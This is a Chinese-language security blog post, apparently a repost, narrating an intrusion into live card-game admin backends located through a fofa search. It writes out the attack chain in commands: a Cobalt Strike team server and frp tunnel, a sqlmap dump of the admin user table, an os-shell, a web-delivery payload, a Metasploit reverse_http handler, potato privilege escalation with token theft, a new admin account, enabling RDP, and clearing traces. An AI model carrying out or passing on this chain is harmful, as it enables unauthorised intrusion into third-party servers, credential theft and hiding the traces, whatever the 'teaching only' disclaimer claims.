frp过来cs上线一起打牌吧

文章来源：Tools杂货铺 免责声明：本文提及的安全环境、工具和方法等仅供试用及教学用途，禁止非法使用，请与24小时内删除！ 前期准备 1、搭建cs4.0 首先下载，cs4.0的安装包，然后把包上传到自己的服务器上面，我这里演示使用的是阿里云把包上传服务器上面解压 刚解压的文件，可能没有执行权限，需要给执行文件teamserver增加权限：chmod 777 teamserver 然后我们就可以启动cs，在解压后的目录下：执行 ./teamserver 阿里云服务器ip 密码 返回这样就是启动成功了，服务端就搭建好了 可以在自己的电脑，或者虚拟机上面执行bat文件（win）就可以了 双击输入参数，点击连接 然后就可以多人运动，进入游戏了 在这次测试中，需要在监听器修改一下参数 Add一个，随便写个名字，选中foreign HTTP模式，填写host：阿里云服务器。端口：4444  —— Save 2、frp内网穿透 下载frp压缩包，上传服务器，加压 然后修改frps.ini里面的配置信息：vi frps.ini 我这边用端口4444 然后启动frp： ./frps -c frps.ini 在kali里面配置frpc.ini 然后启动客户端 ./frps -c frps.ini frp后台启动命令 服务端：nohup ./frps -c frps.ini >/dev/null 2>&1 & 客户端：nohup ./frpc -c frpc.ini >/dev/null 2>&1 &     说明：>/dev/null 2>&1 &，表示丢弃。 准备阶段完了，打牌~ 首先信息收集一波确认目标：fofa：body="棋牌后台管理系统" && title=="后台登录" 打开链接后台页面是这样的 前台是这样的 单刀直入，不带人跳坑，工具人肯定是直接使用工具的撒，在后台登录页面随便输入账号密码直接抓包 把数据包保存下来txt 然后sqlmap直接跑 当时是没有截图，人家的sqlmap是用来跑的，我的sqlmap是用来爬的，龟速，直接帖命令加结果 sqlmap -r post.txt --dbs     //跑数据库名 知道管理在RYPlatformManagerDB数据库中（当时没截图，只是把跑出来的数据贴出了文档） 继续 sqlmap -r post.txt -D RYPlatformManagerDB --tables     //跑表名 猜测数据存放在表dbo.Base_Users中（当时龟速跑了好几个表才知道） sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --columns    //跑字段名 当时我是没有跑字段名，直接把整个表给打印出来 sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --dump 跑出来的Password是MD5加密过的，去查询了一下解密是收费的。花钱是不可能花钱的，直接给大佬口算（给有钱的大佬去解密） 得到结果后，直接使用账号密码，成功登录后台（听说有些后台没有怎么处理，能使用弱密码123456直接登，后来我也遇到过一个） 登录进入后台的页面 大概看了一下，没思路，机器人比真人还要多的，确定还要玩这样的游戏？？ 以为这样就结束了吗，答案是不可能 前面知道在后台管理登录页面存在sql注入，那么在sqlmap里面有这么一个参数：--os-shell   获得交互式操作系统的shell sqlmap -r -post.txt –os-shell 然后现在在这里用到了前期搭建的cs4.0来上线 在多人运动游戏里面选择攻击-钓鱼-scripted WEB Delivery 然后会弹窗，把ps命令复制粘贴到kali里面的os-shell执行上线即可 上线后可以看到 然后选中会话右键-目标文件管理/其他操作（自己去尝试） 文件管理这边可以进行一下操作，但是权限不大 在cs里也能进行一些操作，但是太菜了，还是直接连msf把。利用跟前面搭建好的frp内网穿透，来实现。把服务端跟客户端的frp都启动，确保连接上了之后。在kali终端里执行 msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_http //这里一定要用httpset LHOST 127.0.0.1 //这里是监听本地地址即可set LPORT 1234 //端口需要跟前面frp配置的端口对应run 执行完之后，在cs上面,多add一个监听器,配置如下 然后在刚上线的服务器。右键增加会话-选择杠添加的会话 返回kali稍微等一下，连接成功即可 现在msf能成功连接上，操作性就更多了，直接进去查看发现权限是很低的 然后接下来提权 这边用到了土豆提权（MS16-075） meterpreter > upload /root/potato.exe C:\Users\Public //上传文件meterpreter > cd C:\\Users\\Public //切换路径meterpreter > use incognito meterpreter > list_tokens -u //查看当前令牌信息meterpreter > execute -cH -f ./potato.exe //运行文件meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" //切换高权限的令牌，不一定是这个，自己看执行文件后列出的令牌信息meterpreter > getuid //查看是否成功切换了 在msf中上传文件到C盘user的公共目录下 然后打开文件 继续提权，查看当前的权限情况，这边可以看到权限是很小的 执行上传的文件，在查看一下令牌信息（命令：meterpreter > execute -cH -f ./potato.exe   /运行文件，没截到） 然后窃取权限比较高的令牌，然后再看一下当前的权限情况 现在已经窃取成功，那么直接shell进去看看（乱码的话这里可以用chcp 65001修正） 然后先创建个用户，提升为管理员权限 查看一下有没有开放3389（然而并没有） 他没开，自己给他开一个就好了，直接连上，成功登录 最后看到这服务器的配置，我承认我酸了 最后把清理战场（清除痕迹），关机走人 总结：前期通过sqlmap去爬，然后用CS去生成链接丢去sqlmap里面执行上线，通过frp内网穿透，把CS上线的shell传给kali里面的msf继续操作，然后用到烂土豆去提权，（MS16-075）。文章已经做到尽可能详细了，有疑问可以后台给我留言一起啊交流哦！文章写得有点乱，见怪莫怪哈，看完相信会有所收获~ 最后把文中使用到的工具打包供大佬下载学习，在公众号回复：打牌0919   获取下载链接 免责声明：本文提及的安全环境、工具和方法等仅供试用及教学用途，禁止非法使用，请与24小时内删除！ 文章来源：Tools杂货铺